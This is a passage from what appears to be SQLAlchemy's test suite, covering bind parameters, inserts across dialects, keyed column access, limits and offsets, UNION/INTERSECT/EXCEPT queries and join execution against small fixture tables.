x=bindparam('x'), data=bindparam('data'))
self._assert_raises(stmt, {'data': 'data'})
def test_select_where(self):
stmt = select([self.tables.foo]). \
where(self.tables.foo.c.data == bindparam('data')). \
where(self.tables.foo.c.x == bindparam('x'))
self._assert_raises(stmt, {'data': 'data'})
@testing.requires.standalone_binds
def test_select_columns(self):
stmt = select([bindparam('data'), bindparam('x')])
self._assert_raises(
stmt, {'data': 'data'}
)
def test_text(self):
stmt = text("select * from foo where x=:x and data=:data1")
self._assert_raises(
stmt, {'data1': 'data'}
)
def test_required_flag(self):
is_(bindparam('foo').required, True)
is_(bindparam('foo', required=False).required, False)
is_(bindparam('foo', 'bar').required, False)
is_(bindparam('foo', 'bar', required=True).required, True)
c = lambda: None
is_(bindparam('foo', callable_=c, required=True).required, True)
is_(bindparam('foo', callable_=c).required, False)
is_(bindparam('foo', callable_=c, required=False).required, False)
class TableInsertTest(fixtures.TablesTest):
"""test for consistent insert behavior across dialects
regarding the inline=True flag, lower-case 't' tables.
"""
run_create_tables = 'each'
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'foo', metadata,
Column('id', Integer, Sequence('t_id_seq'), primary_key=True),
Column('data', String(50)),
Column('x', Integer)
)
def _fixture(self, types=True):
if types:
t = sql.table(
'foo', sql.column('id', Integer),
sql.column('data', String),
sql.column('x', Integer))
else:
t = sql.table(
'foo', sql.column('id'), sql.column('data'), sql.column('x'))
return t
def _test(self, stmt, row, returning=None, inserted_primary_key=False):
r = testing.db.execute(stmt)
if returning:
returned = r.first()
eq_(returned, returning)
elif inserted_primary_key is not False:
eq_(r.inserted_primary_key, inserted_primary_key)
eq_(testing.db.execute(self.tables.foo.select()).first(), row)
def _test_multi(self, stmt, rows, data):
testing.db.execute(stmt, rows)
eq_(
testing.db.execute(
self.tables.foo.select().
order_by(self.tables.foo.c.id)).fetchall(),
data)
@testing.requires.sequences
def test_explicit_sequence(self):
t = self._fixture()
self._test(
t.insert().values(
id=func.next_value(Sequence('t_id_seq')), data='data', x=5),
(1, 'data', 5)
)
def test_uppercase(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_inline(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.crashes(
"mssql+pyodbc",
"Pyodbc + SQL Server + Py3K, some decimal handling issue")
def test_uppercase_inline_implicit(self):
t = self.tables.foo
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[None]
)
def test_uppercase_implicit(self):
t = self.tables.foo
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
def test_uppercase_direct_params(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[1]
)
@testing.requires.returning
def test_uppercase_direct_params_returning(self):
t = self.tables.foo
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
def test_direct_params(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.fails_on(
'mssql', "lowercase table doesn't support identity insert disable")
@testing.requires.returning
def test_direct_params_returning(self):
t = self._fixture()
self._test(
t.insert().values(id=1, data='data', x=5).returning(t.c.id, t.c.x),
(1, 'data', 5),
returning=(1, 5)
)
@testing.requires.emulated_lastrowid
def test_implicit_pk(self):
t = self._fixture()
self._test(
t.insert().values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_multi_rows(self):
t = self._fixture()
self._test_multi(
t.insert(),
[
{'data': 'd1', 'x': 5},
{'data': 'd2', 'x': 6},
{'data': 'd3', 'x': 7},
],
[
(1, 'd1', 5),
(2, 'd2', 6),
(3, 'd3', 7)
],
)
@testing.requires.emulated_lastrowid
def test_implicit_pk_inline(self):
t = self._fixture()
self._test(
t.insert(inline=True).values(data='data', x=5),
(1, 'data', 5),
inserted_primary_key=[]
)
class KeyTargetingTest(fixtures.TablesTest):
run_inserts = 'once'
run_deletes = None
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
'keyed1', metadata, Column("a", CHAR(2), key="b"),
Column("c", CHAR(2), key="q")
)
Table('keyed2', metadata, Column("a", CHAR(2)), Column("b", CHAR(2)))
Table('keyed3', metadata, Column("a", CHAR(2)), Column("d", CHAR(2)))
Table('keyed4', metadata, Column("b", CHAR(2)), Column("q", CHAR(2)))
Table('content', metadata, Column('t', String(30), key="type"))
Table('bar', metadata, Column('ctype', String(30), key="content_type"))
if testing.requires.schemas.enabled:
Table(
'wschema', metadata,
Column("a", CHAR(2), key="b"),
Column("c", CHAR(2), key="q"),
schema=testing.config.test_schema
)
@classmethod
def insert_data(cls):
cls.tables.keyed1.insert().execute(dict(b="a1", q="c1"))
cls.tables.keyed2.insert().execute(dict(a="a2", b="b2"))
cls.tables.keyed3.insert().execute(dict(a="a3", d="d3"))
cls.tables.keyed4.insert().execute(dict(b="b4", q="q4"))
cls.tables.content.insert().execute(type="t1")
if testing.requires.schemas.enabled:
cls.tables['%s.wschema' % testing.config.test_schema].insert().execute(
dict(b="a1", q="c1"))
@testing.requires.schemas
def test_keyed_accessor_wschema(self):
keyed1 = self.tables['%s.wschema' % testing.config.test_schema]
row = testing.db.execute(keyed1.select()).first()
eq_(row.b, "a1")
eq_(row.q, "c1")
eq_(row.a, "a1")
eq_(row.c, "c1")
def test_keyed_accessor_single(self):
keyed1 = self.tables.keyed1
row = testing.db.execute(keyed1.select()).first()
eq_(row.b, "a1")
eq_(row.q, "c1")
eq_(row.a, "a1")
eq_(row.c, "c1")
def test_keyed_accessor_single_labeled(self):
keyed1 = self.tables.keyed1
row = testing.db.execute(keyed1.select().apply_labels()).first()
eq_(row.keyed1_b, "a1")
eq_(row.keyed1_q, "c1")
eq_(row.keyed1_a, "a1")
eq_(row.keyed1_c, "c1")
@testing.requires.duplicate_names_in_cursor_description
def test_keyed_accessor_composite_conflict_2(self):
keyed1 = self.tables.keyed1
keyed2 = self.tables.keyed2
row = testing.db.execute(select([keyed1, keyed2])).first()
# row.b is unambiguous
eq_(row.b, "b2")
# row.a is ambiguous
assert_raises_message(
exc.InvalidRequestError,
"Ambig",
getattr, row, "a"
)
def test_keyed_accessor_composite_names_precedent(self):
keyed1 = self.tables.keyed1
keyed4 = self.tables.keyed4
row = testing.db.execute(select([keyed1, keyed4])).first()
eq_(row.b, "b4")
eq_(row.q, "q4")
eq_(row.a, "a1")
eq_(row.c, "c1")
@testing.requires.duplicate_names_in_cursor_description
def test_keyed_accessor_composite_keys_precedent(self):
keyed1 = self.tables.keyed1
keyed3 = self.tables.keyed3
row = testing.db.execute(select([keyed1, keyed3])).first()
eq_(row.q, "c1")
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name 'b'",
getattr, row, "b"
)
assert_raises_message(
exc.InvalidRequestError,
"Ambiguous column name 'a'",
getattr, row, "a"
)
eq_(row.d, "d3")
def test_keyed_accessor_composite_labeled(self):
keyed1 = self.tables.keyed1
keyed2 = self.tables.keyed2
row = testing.db.execute(select([keyed1, keyed2]).apply_labels()). \
first()
eq_(row.keyed1_b, "a1")
eq_(row.keyed1_a, "a1")
eq_(row.keyed1_q, "c1")
eq_(row.keyed1_c, "c1")
eq_(row.keyed2_a, "a2")
eq_(row.keyed2_b, "b2")
assert_raises(KeyError, lambda: row['keyed2_c'])
assert_raises(KeyError, lambda: row['keyed2_q'])
def test_column_label_overlap_fallback(self):
content, bar = self.tables.content, self.tables.bar
row = testing.db.execute(
select([content.c.type.label("content_type")])).first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
row = testing.db.execute(select([func.now().label("content_type")])). \
first()
assert content.c.type not in row
assert bar.c.content_type not in row
assert sql.column('content_type') in row
def test_column_label_overlap_fallback_2(self):
content, bar = self.tables.content, self.tables.bar
row = testing.db.execute(content.select(use_labels=True)).first()
assert content.c.type in row
assert bar.c.content_type not in row
assert sql.column('content_type') not in row
def test_columnclause_schema_column_one(self):
keyed2 = self.tables.keyed2
# this is addressed by [ticket:2932]
# ColumnClause._compare_name_for_result allows the
# columns which the statement is against to be lightweight
# cols, which results in a more liberal comparison scheme
a, b = sql.column('a'), sql.column('b')
stmt = select([a, b]).select_from(table("keyed2"))
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
def test_columnclause_schema_column_two(self):
keyed2 = self.tables.keyed2
a, b = sql.column('a'), sql.column('b')
stmt = select([keyed2.c.a, keyed2.c.b])
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
def test_columnclause_schema_column_three(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
a, b = sql.column('a'), sql.column('b')
stmt = text("select a, b from keyed2").columns(a=CHAR, b=CHAR)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
assert stmt.c.a in row
assert stmt.c.b in row
def test_columnclause_schema_column_four(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
a, b = sql.column('keyed2_a'), sql.column('keyed2_b')
stmt = text("select a AS keyed2_a, b AS keyed2_b from keyed2").columns(
a, b)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert a in row
assert b in row
assert stmt.c.keyed2_a in row
assert stmt.c.keyed2_b in row
def test_columnclause_schema_column_five(self):
keyed2 = self.tables.keyed2
# this is also addressed by [ticket:2932]
stmt = text("select a AS keyed2_a, b AS keyed2_b from keyed2").columns(
keyed2_a=CHAR, keyed2_b=CHAR)
row = testing.db.execute(stmt).first()
assert keyed2.c.a in row
assert keyed2.c.b in row
assert stmt.c.keyed2_a in row
assert stmt.c.keyed2_b in row
class LimitTest(fixtures.TestBase):
__backend__ = True
@classmethod
def setup_class(cls):
global users, addresses, metadata
metadata = MetaData(testing.db)
users = Table(
'query_users', metadata,
Column('user_id', INT, primary_key=True),
Column('user_name', VARCHAR(20)),
)
addresses = Table(
'query_addresses', metadata,
Column('address_id', Integer, primary_key=True),
Column('user_id', Integer, ForeignKey('query_users.user_id')),
Column('address', String(30)))
metadata.create_all()
users.insert().execute(user_id=1, user_name='john')
addresses.insert().execute(address_id=1, user_id=1, address='addr1')
users.insert().execute(user_id=2, user_name='jack')
addresses.insert().execute(address_id=2, user_id=2, address='addr1')
users.insert().execute(user_id=3, user_name='ed')
addresses.insert().execute(address_id=3, user_id=3, address='addr2')
users.insert().execute(user_id=4, user_name='wendy')
addresses.insert().execute(address_id=4, user_id=4, address='addr3')
users.insert().execute(user_id=5, user_name='laura')
addresses.insert().execute(address_id=5, user_id=5, address='addr4')
users.insert().execute(user_id=6, user_name='ralph')
addresses.insert().execute(address_id=6, user_id=6, address='addr5')
users.insert().execute(user_id=7, user_name='fido')
addresses.insert().execute(address_id=7, user_id=7, address='addr5')
@classmethod
def teardown_class(cls):
metadata.drop_all()
def test_select_limit(self):
r = users.select(limit=3, order_by=[users.c.user_id]).execute(). \
fetchall()
self.assert_(r == [(1, 'john'), (2, 'jack'), (3, 'ed')], repr(r))
@testing.requires.offset
def test_select_limit_offset(self):
"""Test the interaction between limit and offset"""
r = users.select(limit=3, offset=2, order_by=[users.c.user_id]). \
execute().fetchall()
self.assert_(r == [(3, 'ed'), (4, 'wendy'), (5, 'laura')])
r = users.select(offset=5, order_by=[users.c.user_id]).execute(). \
fetchall()
self.assert_(r == [(6, 'ralph'), (7, 'fido')])
def test_select_distinct_limit(self):
"""Test the interaction between limit and distinct"""
r = sorted(
[x[0] for x in select([addresses.c.address]).distinct().
limit(3).order_by(addresses.c.address).execute().fetchall()])
self.assert_(len(r) == 3, repr(r))
self.assert_(r[0] != r[1] and r[1] != r[2], repr(r))
@testing.requires.offset
@testing.fails_on('mssql', 'FIXME: unknown')
def test_select_distinct_offset(self):
"""Test the interaction between distinct and offset"""
r = sorted(
[x[0] for x in select([addresses.c.address]).distinct().
offset(1).order_by(addresses.c.address).
execute().fetchall()])
eq_(len(r), 4)
self.assert_(r[0] != r[1] and r[1] != r[2] and r[2] != r[3], repr(r))
@testing.requires.offset
def test_select_distinct_limit_offset(self):
"""Test the interaction between limit and limit/offset"""
r = select([addresses.c.address]).order_by(addresses.c.address). \
distinct().offset(2).limit(3).execute().fetchall()
self.assert_(len(r) == 3, repr(r))
self.assert_(r[0] != r[1] and r[1] != r[2], repr(r))
class CompoundTest(fixtures.TestBase):
"""test compound statements like UNION, INTERSECT, particularly their
ability to nest on different databases."""
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, t1, t2, t3
metadata = MetaData(testing.db)
t1 = Table(
't1', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
t2 = Table(
't2', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
t3 = Table(
't3', metadata,
Column(
'col1', Integer, test_needs_autoincrement=True,
primary_key=True),
Column('col2', String(30)),
Column('col3', String(40)),
Column('col4', String(30)))
metadata.create_all()
t1.insert().execute([
dict(col2="t1col2r1", col3="aaa", col4="aaa"),
dict(col2="t1col2r2", col3="bbb", col4="bbb"),
dict(col2="t1col2r3", col3="ccc", col4="ccc"),
])
t2.insert().execute([
dict(col2="t2col2r1", col3="aaa", col4="bbb"),
dict(col2="t2col2r2", col3="bbb", col4="ccc"),
dict(col2="t2col2r3", col3="ccc", col4="aaa"),
])
t3.insert().execute([
dict(col2="t3col2r1", col3="aaa", col4="ccc"),
dict(col2="t3col2r2", col3="bbb", col4="aaa"),
dict(col2="t3col2r3", col3="ccc", col4="bbb"),
])
@engines.close_first
def teardown(self):
pass
@classmethod
def teardown_class(cls):
metadata.drop_all()
def _fetchall_sorted(self, executed):
return sorted([tuple(row) for row in executed.fetchall()])
@testing.requires.subqueries
def test_union(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2)
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
found1 = self._fetchall_sorted(u.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(u.alias('bar').select().execute())
eq_(found2, wanted)
@testing.fails_on('firebird', "doesn't like ORDER BY with UNIONs")
def test_union_ordered(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2, order_by=['col3', 'col4'])
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
eq_(u.execute().fetchall(), wanted)
@testing.fails_on('firebird', "doesn't like ORDER BY with UNIONs")
@testing.requires.subqueries
def test_union_ordered_alias(self):
(s1, s2) = (
select([t1.c.col3.label('col3'), t1.c.col4.label('col4')],
t1.c.col2.in_(["t1col2r1", "t1col2r2"])),
select([t2.c.col3.label('col3'), t2.c.col4.label('col4')],
t2.c.col2.in_(["t2col2r2", "t2col2r3"]))
)
u = union(s1, s2, order_by=['col3', 'col4'])
wanted = [('aaa', 'aaa'), ('bbb', 'bbb'), ('bbb', 'ccc'),
('ccc', 'aaa')]
eq_(u.alias('bar').select().execute().fetchall(), wanted)
@testing.crashes('oracle', 'FIXME: unknown, verify not fails_on')
@testing.fails_on(
'firebird',
"has trouble extracting anonymous column from union subquery")
@testing.fails_on('mysql', 'FIXME: unknown')
@testing.fails_on('sqlite', 'FIXME: unknown')
def test_union_all(self):
e = union_all(
select([t1.c.col3]),
union(
select([t1.c.col3]),
select([t1.c.col3]),
)
)
wanted = [('aaa',), ('aaa',), ('bbb',), ('bbb',), ('ccc',), ('ccc',)]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias('foo').select().execute())
eq_(found2, wanted)
def test_union_all_lightweight(self):
"""like test_union_all, but breaks the sub-union into
a subquery with an explicit column reference on the outside,
more palatable to a wider variety of engines.
"""
u = union(
select([t1.c.col3]),
select([t1.c.col3]),
).alias()
e = union_all(
select([t1.c.col3]),
select([u.c.col3])
)
wanted = [('aaa',), ('aaa',), ('bbb',), ('bbb',), ('ccc',), ('ccc',)]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias('foo').select().execute())
eq_(found2, wanted)
@testing.requires.intersect
def test_intersect(self):
i = intersect(
select([t2.c.col3, t2.c.col4]),
select([t2.c.col3, t2.c.col4], t2.c.col4 == t3.c.col3)
)
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found1 = self._fetchall_sorted(i.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(i.alias('bar').select().execute())
eq_(found2, wanted)
@testing.requires.except_
@testing.fails_on('sqlite', "Can't handle this style of nesting")
def test_except_style1(self):
e = except_(union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
), select([t2.c.col3, t2.c.col4]))
wanted = [('aaa', 'aaa'), ('aaa', 'ccc'), ('bbb', 'aaa'),
('bbb', 'bbb'), ('ccc', 'bbb'), ('ccc', 'ccc')]
found = self._fetchall_sorted(e.alias().select().execute())
eq_(found, wanted)
@testing.requires.except_
def test_except_style2(self):
# same as style1, but add alias().select() to the except_().
# sqlite can handle it now.
e = except_(union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select(), select([t2.c.col3, t2.c.col4]))
wanted = [('aaa', 'aaa'), ('aaa', 'ccc'), ('bbb', 'aaa'),
('bbb', 'bbb'), ('ccc', 'bbb'), ('ccc', 'ccc')]
found1 = self._fetchall_sorted(e.execute())
eq_(found1, wanted)
found2 = self._fetchall_sorted(e.alias().select().execute())
eq_(found2, wanted)
@testing.fails_on('sqlite', "Can't handle this style of nesting")
@testing.requires.except_
def test_except_style3(self):
# aaa, bbb, ccc - (aaa, bbb, ccc - (ccc)) = ccc
e = except_(
select([t1.c.col3]), # aaa, bbb, ccc
except_(
select([t2.c.col3]), # aaa, bbb, ccc
select([t3.c.col3], t3.c.col3 == 'ccc'), # ccc
)
)
eq_(e.execute().fetchall(), [('ccc',)])
eq_(e.alias('foo').select().execute().fetchall(), [('ccc',)])
@testing.requires.except_
def test_except_style4(self):
# aaa, bbb, ccc - (aaa, bbb, ccc - (ccc)) = ccc
e = except_(
select([t1.c.col3]), # aaa, bbb, ccc
except_(
select([t2.c.col3]), # aaa, bbb, ccc
select([t3.c.col3], t3.c.col3 == 'ccc'), # ccc
).alias().select()
)
eq_(e.execute().fetchall(), [('ccc',)])
eq_(
e.alias().select().execute().fetchall(),
[('ccc',)]
)
@testing.requires.intersect
@testing.fails_on('sqlite', "sqlite can't handle leading parenthesis")
def test_intersect_unions(self):
u = intersect(
union(
select([t1.c.col3, t1.c.col4]),
select([t3.c.col3, t3.c.col4]),
),
union(
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'ccc'), ('bbb', 'aaa'), ('ccc', 'bbb')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_intersect_unions_2(self):
u = intersect(
union(
select([t1.c.col3, t1.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select(),
union(
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'ccc'), ('bbb', 'aaa'), ('ccc', 'bbb')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_intersect_unions_3(self):
u = intersect(
select([t2.c.col3, t2.c.col4]),
union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
)
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found = self._fetchall_sorted(u.execute())
eq_(found, wanted)
@testing.requires.intersect
def test_composite_alias(self):
ua = intersect(
select([t2.c.col3, t2.c.col4]),
union(
select([t1.c.col3, t1.c.col4]),
select([t2.c.col3, t2.c.col4]),
select([t3.c.col3, t3.c.col4]),
).alias().select()
).alias()
wanted = [('aaa', 'bbb'), ('bbb', 'ccc'), ('ccc', 'aaa')]
found = self._fetchall_sorted(ua.select().execute())
eq_(found, wanted)
t1 = t2 = t3 = None
class JoinTest(fixtures.TestBase):
"""Tests join execution.
The compiled SQL emitted by the dialect might be ANSI joins or
theta joins ('old oracle style', with (+) for OUTER). This test
tries to exercise join syntax and uncover any inconsistencies in
`JOIN rhs ON lhs.col=rhs.col` vs `rhs.col=lhs.col`. At least one
database seems to be sensitive to this.
"""
__backend__ = True
@classmethod
def setup_class(cls):
global metadata
global t1, t2, t3
metadata = MetaData(testing.db)
t1 = Table('t1', metadata,
Column('t1_id', Integer, primary_key=True),
Column('name', String(32)))
t2 = Table('t2', metadata,
Column('t2_id', Integer, primary_key=True),
Column('t1_id', Integer, ForeignKey('t1.t1_id')),
Column('name', String(32)))
t3 = Table('t3', metadata,
Column('t3_id', Integer, primary_key=True),
Column('t2_id', Integer, ForeignKey('t2.t2_id')),
Column('name', String(32)))
metadata.drop_all()
metadata.create_all()
# t1.10 -> t2.20 -> t3.30
# t1.11 -> t2.21
# t1.12
t1.insert().execute({'t1_id': 10, 'name': 't1 #10'},
{'t1_id': 11, 'name': 't1 #11'},
{'t1_id': 12, 'name': 't1 #12'})
t2.insert().execute({'t2_id': 20, 't1_id': 10, 'name': 't2 #20'},
{'t2_id': 21, 't1_id': 11, 'name': 't2 #21'})
t3.insert().execute({'t3_id': 30, 't2_id': 20, 'name': 't3 #30'})
@classmethod
def teardown_class(cls):
metadata.drop_all()
def assertRows(self, statement, expected):
"""Execute a statement and assert that rows returned equal expected."""
found = sorted([tuple(row)
for row in statement.execute().fetchall()])
eq_(found, sorted(expected))
def test_join_x1(self):
"""Joins t1->t2."""
for criteria in (t1.c.t1_id == t2.c.t1_id, t2.c.t1_id == t1.c.t1_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2, criteria)])
self.assertRows(expr, [(10, 20), (11, 21)])
def test_join_x2(self):
"""Joins t1->t2->t3."""
for criteria in (t1.c.t1_id == t2.c.t1_id, t2.c.t1_id == t1.c.t1_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2, criteria)])
self.assertRows(expr, [(10, 20), (11, 21)])
def test_outerjoin_x1(self):
"""Outer joins t1->t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id],
from_obj=[t1.join(t2).join(t3, criteria)])
self.assertRows(expr, [(10, 20)])
def test_outerjoin_x2(self):
"""Outer joins t1->t2,t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
from_obj=[t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria)])
self.assertRows(
expr, [(10, 20, 30), (11, 21, None), (12, None, None)])
def test_outerjoin_where_x2_t1(self):
"""Outer joins t1->t2,t3, where on t1."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.name == 't1 #10',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.t1_id < 12,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t2(self):
"""Outer joins t1->t2,t3, where on t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.name == 't2 #20',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.t2_id < 29,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t3(self):
"""Outer joins t1->t2,t3, where on t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.name == 't3 #30',
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.t3_id < 39,
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_outerjoin_where_x2_t1t3(self):
"""Outer joins t1->t2,t3, where on t1 and t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t3.c.name == 't3 #30'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 19, t3.c.t3_id < 39),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_outerjoin_where_x2_t1t2(self):
"""Outer joins t1->t2,t3, where on t1 and t2."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10', t2.c.name == 't2 #20'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 12, t2.c.t2_id < 39),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_outerjoin_where_x2_t1t2t3(self):
"""Outer joins t1->t2,t3, where on t1, t2 and t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.name == 't1 #10',
t2.c.name == 't2 #20',
t3.c.name == 't3 #30'),
from_obj=[(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
and_(t1.c.t1_id < 19, t2.c.t2_id < 29, t3.c.t3_id < 39),
from_obj=[
(t1.outerjoin(t2, t1.c.t1_id == t2.c.t1_id).
outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
def test_mixed(self):
"""Joins t1->t2, outer t2->t3."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
print(expr)
self.assertRows(expr, [(10, 20, 30), (11, 21, None)])
def test_mixed_where(self):
"""Joins t1->t2, outer t2->t3, plus a where on each table in turn."""
for criteria in (t2.c.t2_id == t3.c.t2_id, t3.c.t2_id == t2.c.t2_id):
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t1.c.name == 't1 #10',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t2.c.name == 't2 #20',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
[t1.c.t1_id, t2.c.t2_id, t3.c.t3_id],
t3.c.name == 't3 #30',
from_obj=[(t1.join(t2).outerjoin(t3, criteria))])
self.assertRows(expr, [(10, 20, 30)])
expr = select(
